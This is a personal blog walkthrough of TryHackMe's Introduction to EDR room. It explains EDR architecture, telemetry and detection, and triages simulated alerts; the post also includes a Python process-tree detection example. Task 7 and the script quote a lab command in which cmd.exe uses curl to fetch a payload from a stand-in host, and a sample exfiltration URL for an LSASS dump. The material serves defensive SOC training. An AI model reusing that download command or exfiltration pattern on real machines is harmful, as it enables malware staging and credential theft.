TryHackMe: Introduction to EDR Walkthrough (SOC Level 1)

Welcome to this walkthrough of the Introduction to EDR Room on TryHackMe. Endpoint Detection and Response (EDR) is a security solution designed to monitor, detect, and respond to advanced threats at the endpoint level. As a SOC analyst, it is essential for you to understand how the EDR works.

Introduction to EDR room

Room URL:
https://tryhackme.com/room/introductiontoedrs

I am making these walkthroughs to keep myself motivated to learn cyber security, and to ensure that I remember the knowledge gained by these challenges on HTB and THM. Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.


Task 1: Introduction

Endpoint Detection and Response (EDR) is a security solution designed to monitor, detect, and respond to advanced threats at the endpoint level. As a SOC analyst, it is essential for you to understand how the EDR works since it is a widely adopted solution in organizations to protect their endpoints. In this room, we will see how an EDR differs from a traditional antivirus and what data it collects from the endpoints. We will also discuss the detection and response capabilities it provides.

Learning Objectives

  • Understand the basics of EDR and how it works
  • Differentiate EDR from traditional Antivirus solutions
  • Examine the architecture of an EDR solution
  • Analyze the types of telemetry it collects from endpoints
  • Understand the detection and response capabilities of an EDR
  • Investigate a realistic alert in the EDR

Room Prerequisites

  • Basic knowledge of different endpoints (Windows, Linux, Mac) and the common attacks on them
  • Awareness of the role of the SOC team

Questions

I am all set!

Answer: No answer needed


Task 2: What is an EDR?

As businesses increasingly rely on digital devices for their core operations, cyber threats are growing just as fast. Traditional network security often protects systems within the corporate perimeter—but with the rise of remote work, many devices now operate outside that protection.

This is where Endpoint Detection and Response (EDR) comes in. EDR solutions provide deep, continuous monitoring and protection for endpoint devices—no matter where they are. They detect, investigate, and respond to threats in real time, ensuring devices remain secure even outside the network.

Some leading EDR tools include:

  • CrowdStrike Falcon
  • SentinelOne ActiveEDR
  • Microsoft Defender for Endpoint
  • OpenEDR
  • Symantec EDR

While their architectures are similar, features and interfaces may vary.

The Three Pillars of EDR

  1. Visibility – EDR provides unparalleled insight into endpoint activity, tracking processes, registry and file changes, and user behavior. Analysts can visualize process trees and access detailed historical data for threat hunting.
  2. Detection – Combining signature- and behavior-based methods, EDR detects suspicious activity, fileless malware, and deviations from normal behavior. Many tools map detections to MITRE ATT&CK tactics for better analysis.
  3. Response – Analysts can take direct action from the EDR console: isolate hosts, terminate processes, quarantine files, or connect remotely for investigation through real-time response (RTR) features.

Together, these pillars make EDR a cornerstone of modern cybersecurity operations. While it offers powerful endpoint protection, it’s worth noting that EDR focuses solely on hosts—it doesn’t detect network-level threats.

Questions

Which feature of EDR provides a complete context for all the detections?

The answer is visibility. This feature ensures the collection of detailed data from the endpoints, including process modifications, registry modifications, file and folder modifications, user actions, and much more. The analyst can see the whole process tree with a complete activity timeline of the sequence of actions. Any detection in the EDR therefore lands with full context.

Answer: Visibility

Which process spawned sc.exe?

For this we should look at the process tree screenshot on THM.

It shows which processes were spawned on the endpoint. Each node represents a process, and the lines connecting them represent their parent-child relationships.

You can see the sc.exe process on the right. It was spawned by the cmd.exe process.

Answer: cmd.exe


Task 3: Beyond the Antivirus

Why EDR Is Needed Beyond Antivirus

  • Antivirus (AV) provides basic protection by detecting known threats using signature-based methods.
  • Endpoint Detection and Response (EDR) offers advanced protection by continuously monitoring endpoint behavior and detecting suspicious activities—even those that bypass AV.

Airport Analogy

  • AV = Immigration Check: Blocks known threats based on a database of signatures.
  • EDR = Security Officers: Monitors ongoing behavior inside the endpoint, detects anomalies, and responds to threats that AV misses.

Behavioral Monitoring Advantages of EDR

  • Tracks process relationships, memory injections, and network activity.
  • Provides visibility across all endpoints in an organization.
  • Enables proactive threat hunting and incident response.

AV vs EDR: Attack Scenario Comparison

| Step | Attack Step | AV Response | EDR Response |
| --- | --- | --- | --- |
| 1 | Phishing email with malicious Word doc | Ignores if no known signature | Logs and monitors download |
| 2 | Document opened | Ignores legitimate app | Records execution of Word |
| 3 | Macro spawns PowerShell | Ignores unknown macro | Flags unusual process behavior |
| 4 | Obfuscated PowerShell script | Typically undetected | Flags obfuscated script |
| 5 | Payload injected into svchost.exe | No memory monitoring | Detects process injection |
| 6 | Remote access gained | No network visibility | Flags outbound connection |
|  | Final Action | May mark as clean | Alerts full attack chain for response |

Questions

In the given analogy, what represents an AV?

In the airport analogy, antivirus systems are like an immigration check. They keep an eye on who comes in, but once a person is inside they no longer watch them.

Answer: immigration check

Which legitimate process was hijacked by the attacker in the scenario?

In step 5 of the scenario the payload is injected into a legitimate svchost.exe. The injection in legitimate system processes is often done to hide a payload.

Answer: svchost.exe

Which security solution might mark this activity as clean?

Antivirus solutions will not flag the malicious injection into svchost.exe, since they do not monitor process memory for injection. An EDR would very likely catch this activity.

Answer: antivirus


Task 4: How an EDR works?

How EDR Works Behind the Scenes

EDR Agents

  • Deployed on endpoints as sensors.
  • Monitor all activities and send detailed data to the central console in real time.
  • Perform basic signature and behavior-based threat detection.

EDR Console

  • Centralized dashboard that receives and analyzes data from agents.
  • Uses machine learning and threat intelligence to correlate events and generate alerts.
  • Provides a holistic view of endpoint security status.

What Happens After Detection

  • SOC analysts review alerts and prioritize based on severity (Critical to Informational).
  • Analysts investigate alerts using detailed logs: file executions, processes, network activity, registry changes.
  • If confirmed as a true threat, analysts can take direct action from the console to contain or remediate.

EDR in the Broader Security Ecosystem

  • EDR works alongside other tools like Firewalls, DLPs, Email Security Gateways, and IAMs.
  • All tools feed into a SIEM (Security Information and Event Management) system for centralized analysis and response.

Questions

Which component of the EDR is responsible for collecting telemetry from the endpoints?

EDR agents collect data from the endpoints (systems).

Answer: Agent

An EDR agent is also known as a?

Since EDR agents collect data, similar to how a temperature sensor collects temperature data, we also call them sensors.

Answer: sensor


Task 5: EDR Telemetry

What Is Telemetry?

  • Telemetry is the detailed data collected by EDR agents from endpoints.
  • It acts like a black box, capturing everything needed for threat detection and investigation.

Types of Collected Telemetry

  • Process Executions and Terminations: Tracks all running and idle processes to spot suspicious behavior.
  • Network Connections: Monitors endpoint traffic to detect C2 servers, unusual ports, or lateral movement.
  • Command Line Activity: Captures commands in CMD, PowerShell, etc., to flag obfuscated or malicious scripts.
  • Files and Folders Modifications: Detects changes linked to ransomware, data staging, or malware drops.
  • Registry Modifications: Observes changes in Windows registry often tied to malicious activity.

Why Telemetry Matters

  • Helps distinguish between legitimate and malicious activity.
  • Enables machine learning and threat intelligence to detect stealthy threats.
  • Supports analysts in reconstructing attack timelines, identifying root causes, and making informed decisions.

Questions

Which telemetry data helps in detecting C2 communications?

Communications with a C2 server have to traverse the network, so network connection telemetry is essential for identifying them.

Answer: Network Connections

Where are the configuration settings of a Windows system primarily stored?

Configuration settings on Windows systems are stored in the registry. Changes in Windows registry are often tied to malicious activity.

Answer: registry


Task 6: Detection And Response Capabilities

Detection Techniques in EDR

  • Behavioral Detection: Flags suspicious behavior patterns, like Word spawning PowerShell, even if files appear clean.
  • Anomaly Detection: Identifies deviations from normal endpoint behavior, helping spot stealthy threats.
  • IOC Matching: Uses threat intelligence feeds to detect known malicious indicators like file hashes.
  • MITRE ATT&CK Mapping: Aligns flagged activities with tactics and techniques for better threat context.
  • Machine Learning Algorithms: Detects complex, multi-stage attacks by analyzing patterns across large datasets.
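The process tree from Task 2, the AV vs EDR attack chain from Task 3 and the behavioural detection described above, as an added example that is not part of the room or any vendor's product: it rebuilds a parent-child tree from constructed process-creation telemetry (the pids, field layout and the invoice path are assumptions; the commands mirror the room's scenario), answers "which process spawned X?", and runs simple behavioural rules that attach the full ancestry and an ATT&CK technique to each alert.

```python
# Added example, not TryHackMe's or a vendor's code: constructed telemetry with an assumed layout.
# Each row is (pid, ppid, image, command_line), one per process start, as an EDR agent would report.
EVENTS = [
    (100, 1,   "explorer.exe", "explorer.exe"),
    (200, 100, "WINWORD.EXE",  r"WINWORD.EXE C:\Users\hr\invoice.docm"),
    (300, 200, "cmd.exe",      r"cmd.exe /c curl http://ayebd.thm/payload.exe -o C:\Users\Public\install.exe"),
    (400, 300, "curl.exe",     r"curl http://ayebd.thm/payload.exe -o C:\Users\Public\install.exe"),
    (500, 100, "cmd.exe",      "cmd.exe"),
    (600, 500, "sc.exe",       "sc.exe query"),
    (700, 100, "syncsvc.exe",  r"C:\Users\haris.khan\AppData\Local\Temp\syncsvc.exe"),
]
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

def build_tree(events):
    """pid -> (ppid, image, cmdline): the 'visibility' pillar in its simplest form."""
    return {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}

def ancestry(tree, pid):
    """Lower-cased images from the given process up to the root, child first."""
    chain = []
    while pid in tree:
        ppid, image, _ = tree[pid]
        chain.append(image.lower())
        pid = ppid
    return chain

def parent_of(tree, image):
    """Answer 'which process spawned <image>?' from the reconstructed tree."""
    for pid, (ppid, img, _) in tree.items():
        if img.lower() == image.lower() and ppid in tree:
            return tree[ppid][1]
    return None

def detect(tree):
    """Behavioural rules from the attack chain; each alert carries the full ancestry for triage."""
    alerts = []
    for pid, (_, image, cmd) in tree.items():
        img, low, chain = image.lower(), cmd.lower(), ancestry(tree, pid)
        if img in SHELLS and len(chain) > 1 and chain[1] in OFFICE:   # Office app spawned a shell
            alerts.append((pid, "Office app spawned shell", "T1204.002", chain))
        if img == "curl.exe" and " -o " in cmd and "\\users\\public\\" in low:  # download to disk
            alerts.append((pid, "curl download to Public dir", "T1105", chain))
        if "\\appdata\\local\\temp\\" in low:  # triage context only; no single ATT&CK technique
            alerts.append((pid, "Execution from AppData\\Temp", None, chain))
    return alerts

if __name__ == "__main__":
    tree = build_tree(EVENTS)
    print(parent_of(tree, "sc.exe"), detect(tree))
```

The plain cmd.exe (pid 500) and sc.exe rows produce no alert, which is the point of looking at parent-child context rather than at a single process name.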

Response Capabilities in EDR

  • Isolate Host: Disconnects infected endpoints from the network to prevent lateral movement.
  • Terminate Process: Stops malicious processes without isolating the host, preserving business operations.
  • Quarantine: Moves suspicious files to a safe location for review or removal.
  • Remote Access: Enables analysts to access endpoint shells for deeper investigation and custom actions.
  • Artefacts Collection: Gathers forensic data like memory dumps, event logs, and registry hives remotely.

Questions

Which feature of the EDR helps you identify threats based on known malicious behaviours? 

Known malicious behaviours are grouped within the cybersecurity world under the term IOCs. In other words: Indicators of Compromise are forensic clues left by a cyberattack that help identify a security breach. Examples include suspicious file hashes, malicious IP addresses, and unusual registry keys. EDRs perform IOC matching to identify such threats.

Answer: IOC Matching


Task 7: Investigate an alert on EDR

Scenario

You are a SOC analyst at TECH THM with access to the EDR console, which shows multiple medium and high-severity detections. Your task is to perform triage on each detection using the available information in the EDR and answer a series of questions related to these detections.

Click on the View Site button to display the static site. We are met by an EDR dashboard:

EDR Dashboard

Questions

Which tool was launched by CMD.exe to download the payload on DESKTOP-HR01?

If we take a look at the four detections, we can see the top one relates to host DESKTOP-HR01:

HR01 detection

Click on it to see details:

Detection summary

We can read in the description that the document triggered cURL:

A macro-enabled Office document (invoice.docm) was opened using WINWORD.EXE. The document triggered CMD, which launched cURL to download a payload from an external domain. The file was saved to disk but never executed — behavior consistent with malware staging tactics.

To get the exact process name it is easier to open the Process Info tab.

Here we can find the exact answer: cURL.exe.

Answer: cURL.exe

What is the absolute path to the downloaded malware on the DESKTOP-HR01 machine?

This answer can be found on the same screen. Take a look at the command line command:

cmd.exe /c curl http://ayebd.thm/payload.exe -o C:\Users\Public\install.exe

We can see the payload being downloaded with curl, and the location where it is saved.

Answer: C:\Users\Public\install.exe

What is the absolute path to the suspicious syncsvc.exe on the WIN-ENG-LAPTOP03 machine?

Time to look at another incident, this time the one called Credential Dumping via LSASS Memory Access on WIN-ENG-LAPTOP03.

Credential dumping incident

Once more we need to look at the Process Info tab to find the answer. It is found under Path when looking at the syncsvc.exe process.

syncsvc.exe process details

Answer: C:\Users\haris.khan\AppData\Local\Temp\syncsvc.exe

On which URL was the exfiltration attempt being made on WIN-ENG-LAPTOP03?

We can find this answer on the same screen, under Network Activity. Here the EDR dashboard states:

Attempted exfil to: https://files-wetransfer.com/upload/session/ab12cd34ef56/dump_2025.dmp

Answer: https://files-wetransfer.com/upload/session/ab12cd34ef56/dump_2025.dmp

What was UpdateAgent.exe labelled by Threat Intel on DESKTOP-DEV01?

Change to the detection Execution from AppData Directory on DESKTOP-DEV01. Enter the process Info tab and find the UpdateAgent.exe process:

UpdateAgent.exe process

Here you will see that the Threat Intel section mentions:
Known internal IT utility tool

Answer: Known internal IT utility tool


Task 8: Conclusion

Congratulations! We have learned one of the essential tools used in the Security Operations Center (SOC), Endpoint Detection and Response (EDR). As a SOC analyst, we now understand the basic architecture of EDR and its capabilities beyond Antivirus. We explored the detailed telemetry that an EDR provides. We also saw the powerful detection and response capabilities of EDR solutions. Lastly, we practiced investigating some detections on a simulated EDR.

This sets a strong baseline for working with essential security solutions. In the upcoming rooms of this module, we will explore some other security solutions that a SOC analyst works on in a Security Operations Center (SOC).

Questions

Complete the room.

Answer: No answer needed.

Congratulations on completing Introduction to EDR!!!

Introduction to EDR complete!

Congratulations on completing Introduction to EDR. I think this basic room provided a nice and quick introduction to EDR systems, and how they relate to SIEM solutions. I particularly enjoyed the last few tasks. I hope you agree 🙂

Come back soon for more walkthroughs of rooms on TryHackMe and HackTheBox, and other Cybersecurity discussions.

Find other walkthroughs of the TryHackMe SOC Level 1 Path here.

Find my other walkthroughs here.

Like my articles?

You are welcome to comment on this post, or share my post with friends. I would be even more grateful if you support me by buying me a cup of coffee:

Buy me a coffee

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg
